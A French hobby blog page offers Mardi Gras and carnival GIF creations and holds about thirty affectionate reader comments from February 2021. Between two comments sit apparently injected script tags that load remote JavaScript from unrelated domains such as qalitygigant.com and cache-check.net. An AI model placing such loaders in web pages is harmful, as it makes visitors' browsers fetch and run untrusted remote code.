• Créas Mardi-Gras - Carnaval pour Vous ♥♥♥

     

     

    Créas Mardi-Gras - Carnaval pour Vous ♥♥♥

     

    { Rubrique "Fêtes"-"Carnaval" ICI et Rubrique "Bonjour"-"Divers" ICI }

     

     

    Toutes sont à Retrouver dans la Rubrique "Fêtes"-"Carnaval" ICI

     

     

    Créas Mardi-Gras - Carnaval pour Vous ♥♥♥

     

    { Les Enfants "Mes Tubes"-"Carnaval" ICI }

     

     

     

     

     

    Créas Mardi-Gras - Carnaval pour Vous ♥♥♥

     

    { La Dame "Mes Tubes"-"Carnaval" ICI }

     

     

     

     

     

    Créas Mardi-Gras - Carnaval pour Vous ♥♥♥

     

     

     

     

     

    Créas Mardi-Gras - Carnaval pour Vous ♥♥♥

     

     

     

     

     

    Créas Mardi-Gras - Carnaval pour Vous ♥♥♥

     

    { Rubrique "Merci Visites"-"Divers" ICI }

     

     

     

     

     

    Créas Mardi-Gras - Carnaval pour Vous ♥♥♥

     

    { Rubrique "Fêtes"-"Carnaval" ICI et Rubrique "Bonne Journée"-"Divers" ICI }

     

     


    Tags Tags : , , , , , , ,
  • Commentaires

    30
    Jeudi 18 Février 2021 à 18:47

    Coucou Valie .

    Tes créations sont magnifiques.Dommage cette année  notre carnaval vénitien n'aura pas lieu mon costume ne m'ira plus d'ici 2022 mdr .Bisous bonne soirée

    29
    Mercredi 17 Février 2021 à 08:04

    Quels ravissements tes créations carnavalesques ! Tu es toujours aussi inspirée ! Bravo !

    Bonne journée !

    Bisous bisous !

    28
    Mardi 16 Février 2021 à 20:10
    Merci pour ces belles créas carnaval Gros bisous Pierrette67
    27
    Mardi 16 Février 2021 à 09:27
    Hélène

    En ce qui me concerne ce sera mercredi gras, n'en déplaise aux traditions et croyances ... à moins que M6 modifie sa programmation !! MDR
    Jolies créations en tout cas ! Je ne suis pas sure que nous ayons beaucoup de carnaval cette année !!

    Gros Bisous et Bravo pour ton joli travail

    26
    gaelle
    Lundi 15 Février 2021 à 15:52

    pour faire plaisir aux enfants, la maitresse de mon petit fils les autorisent a venir déguisés a l'ecole ce mardi. J'attend avec impatience les photos que ma fille va m'envoyer.

    Merci pour ces gifs toujours jolis et tellemnt bien réalisés

    biz

    gaelle

    25
    Lundi 15 Février 2021 à 09:43

    Mes enfants sont grands résultat, je ne sais plus quand tombe ce fameux mardi lol ! 

    Bises

    Thaly

    24
    Lundi 15 Février 2021 à 04:28

    Bonjour Valie 

    De bien  jolies créas pour Mardi Gras avec des belles couleurs la dernière ta bisous Bonne journée est top ! j'adore tes petits lutins qui bougent qui dansent . Bravo mon amie  Bon début de semaine avec toute mon amitié et des gros bisous 

    23
    mamijojo77100
    Samedi 13 Février 2021 à 20:22

    Encore de superbes gifs a nous concocter.. merci pour tout ca. Passe une bonne journee demain et surtout bien au chaud.. gbisous  joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1613244013199" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    22
    Samedi 13 Février 2021 à 18:14

    Belles créas colorées à souhait en cette période de carnaval 

    Bon Dimanche 

    Bisous

    21
    Samedi 13 Février 2021 à 16:46
    C'est joli et bien coloré ! Bon W. End. Bises.
    20
    Jeannine (cristal24)
    Samedi 13 Février 2021 à 16:36

    Très belles créations; bravo et merci.

    Bon samedi, j'espère qu'il ne fait pas trop mauvais du côté de chez toi.

    Bises.

    Jeannine

    19
    Samedi 13 Février 2021 à 16:27

    Coucou ma chère Valie

    Encore de bien belles créations!!! C'est vrai que mardi gras est pour très vite!!!!

    Je te souhaite un très bon week-end! Le temps est bien maussade sur la Côte!!!! J'espère que tu auras un peu de soleil!

    Bonne soirée et gros bisous tendresse

    18
    Samedi 13 Février 2021 à 16:26

    Bonjour ma douce Valie

    Magnifiques tes créations pour le Carnaval et Mardi Gras

    Bonne fin de journée et bonne fête de la Saint-Valentin pour demain

    gros bisous d'amitié

    Janine

    Saint-Valentin

    17
    Samedi 13 Février 2021 à 16:21

    Mille mercis ma belle Valie, bravo pour ces magnifiques gifs. Passe une belle fin de journée, bisou rose tendresse !

    16
    Samedi 13 Février 2021 à 14:51

    Merci Valie pour ces magnifiques créas. de mardi gras,j'en utiliserais pour mardi 16

    passe une bonne journée

    15
    Samedi 13 Février 2021 à 13:52

      merci  valie  pour  toutes  ces belles  images  et  je  peux  te  dire  qu'elles  vont  être utilisées 

      gros  bisous

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    14
    Samedi 13 Février 2021 à 12:02

    Merci ma Valie c est toujours aussi beau ce que tu fais j adore et je te souhaite un excellent week end ici sous un grand soleil depuis 8 jours très beau soleil une seule journée de vent et de froid 

    Prends bien soin de toi ma douce, moi je prends mon petit panier et je vais te prendre quelques creations pour mettre sur mon blog bisous d affection 

    13
    Samedi 13 Février 2021 à 11:26
    dane

    c' est magnifique, colorés, ça fait du bien de voir de jolies couleurs merci et félicitations bisous 

    12
    Samedi 13 Février 2021 à 11:16

    De jolies créations pour mardi gras!! Bravo à toi.....

    Bisous et doux week-end

    11
    marianne pirotte
    Samedi 13 Février 2021 à 10:37

    Merci pour ces jolies créations !!

    Gros bisous

    Marianne

    10
    Samedi 13 Février 2021 à 10:35
    lamanuelle25

    Merci beaucoup ma belle, bises Nadine

    9
    Samedi 13 Février 2021 à 10:18

    Toujours de belles créations, bravo à toi ma tite Valie!

    Bisous et beau weed-end

    8
    Jour de mai
    Samedi 13 Février 2021 à 09:40

    Coucou Valie, 

    Merci pour ces magnifiques créations car comme il n'y aura pas de carnaval cette année, cela donne un pu de gaîeté. Bravo et merci pour le partage. 

    Bon week end bien frais même si chez nous la neige a presque disparu. 

    Gros bisous ♥♥♥

    LN

    7
    Samedi 13 Février 2021 à 09:13

    Tes créas sont vraiment très belles, Merci du partage ma Chère Valie !!

    Agréable week-end bien au chaud, chez moi c'est tout blanc...

    Mille Bisous affectueux.

    6
    Samedi 13 Février 2021 à 09:12

    cette année les carnavals n'existeront pas ! alors on va quand même essayer de se régaler.

    Belles illustrations ; 

    Bon week-end ; bisous / Nicole

    5
    Samedi 13 Février 2021 à 08:46

    merci beaucoup valie pour tes magnifiques créas !

    bisous et bon week end

    4
    Samedi 13 Février 2021 à 08:45

    Belles créations de Mardi Gras...

    Merci de ta visite et doux week-end avec un beau soleil chez nous !

    Bises

    3
    Samedi 13 Février 2021 à 07:59

    Bonjour Valie 

     Merci pour ces très jolies creas  Je te souhaite un doux weekend .ici sur Lyon il a neigé ! le paysage est magnifique ! Avec toute mon amitié   Bisous 

    2
    Samedi 13 Février 2021 à 07:32

    Bonjour ma Valie, encore et toujours de merveilleuses créations, bravo à toi

    Je te souhaite un superbe weekend

    Bisous de Pat

    1
    JO
    Samedi 13 Février 2021 à 07:27

    Coucou ma Valie

    Rolàlà!!! je ne sais pas comment tu fais mais c'est MERVEILLEUX. C'est incroyablement magnifique♥♥♥

    Toujours un réel plaisir des yeux.

    MERCI pour le partage

    Bon week-end, j'espère pour toi sans la neige.

    BISOUS DOUX♥♥♥♥♥

    JO

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :